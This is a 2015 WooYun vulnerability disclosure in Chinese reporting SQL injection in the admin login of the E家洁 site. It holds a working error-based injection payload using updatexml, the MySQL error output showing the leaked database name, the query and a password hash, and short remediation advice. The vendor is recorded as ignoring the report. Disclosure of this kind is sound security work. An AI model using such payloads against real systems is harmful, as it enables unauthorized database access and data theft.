E家洁某管理后台SQL注射 | wooyun-2015-0146397

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0146397

漏洞标题：

E家洁某管理后台SQL注射

漏洞详情

披露状态：

2015-10-13：细节已通知厂商并且等待厂商处理中
2015-10-18：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

http://admin.1jiajie.com/v2/index.php?action=login&do=auth

POST:username=admin'/**/and/**/1<(updatexml(1,concat(0x5e24,(select/**/user()),0x5e24),1))/**/and/**/'1'/**/like/**/'1&password=12345&user_id=&user_name=

漏洞证明：

MySQL Query Error
Mysql error description: XPATH syntax error: '^$sq_ejiajie_v2^$'
Mysql error number: 1105
Date: 2015-10-13 @ 12:38
Script: http://admin.1jiajie.com/v2/index.php?action=login&do=auth
SQL: SELECT COUNT(*) as count FROM jc_admin_user WHERE `username` ='admin'/**/and/**/1<(updatexml(1,concat(0x5e24,(select/**/database()),0x5e24),1))/**/and/**/'1'/**/like/**/'1' AND `password` ='389e85b9d5ae561c008a5147176c2704' AND `enable` ='1' AND `is_stop` ='0'

修复方案：

1、此网站过滤了= 空格注释等符号。但是没有过滤","、"（）"等，所以建议修改防注入策略。
2、找回密码功能也有问题。

版权声明：转载请注明来源 we8_@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-10-18 12:48

厂商回复：

漏洞Rank：4 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 we8_@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 we8_@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞